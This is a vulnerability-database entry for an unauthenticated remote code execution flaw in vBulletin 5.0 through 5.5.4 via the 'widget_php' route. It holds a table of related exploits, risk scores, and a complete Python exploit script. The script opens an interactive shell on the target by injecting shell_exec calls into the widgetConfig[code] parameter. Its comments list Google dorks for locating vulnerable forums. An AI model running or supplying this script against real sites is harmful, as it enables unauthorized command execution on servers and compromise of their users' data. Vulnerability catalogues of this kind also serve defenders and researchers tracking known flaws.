vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution
| Reporter | Title | Published | Views | Family All 70 |
|---|---|---|---|---|
| vBulletin 5.x - Remote Command Execution Exploit | 1 Oct 201900:00 | – | zdt | |
| vBulletin 5.5.4 Remote Command Execution Exploit #RCE | 11 Dec 201900:00 | – | zdt | |
| vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit | 12 Aug 202000:00 | – | zdt | |
| vBulletin 5.x Remote Code Execution Exploit | 12 Aug 202000:00 | – | zdt | |
| Exploit for Code Injection in Vbulletin | 16 Aug 202018:17 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 16 Aug 202018:17 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 26 Sep 201903:56 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 12 Oct 201918:51 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 24 Aug 202016:15 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 26 Sep 201903:27 | – | githubexploit |
10
#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
import requests
import sys
if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
params = {"routestring":"ajax/render/widget_php"}
while True:
try:
cmd = raw_input("vBulletin$ ")
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = requests.post(url = sys.argv[1], data = params)
if r.status_code == 200:
print r.text
else:
sys.exit("Exploit failed! :(")
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception, e:
sys.exit(str(e))Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Nov 2019 00:00Current
8.6High risk
Vulners AI Score8.6
CVSS 27.5
CVSS 3.19.8
EPSS0.99728
SSVC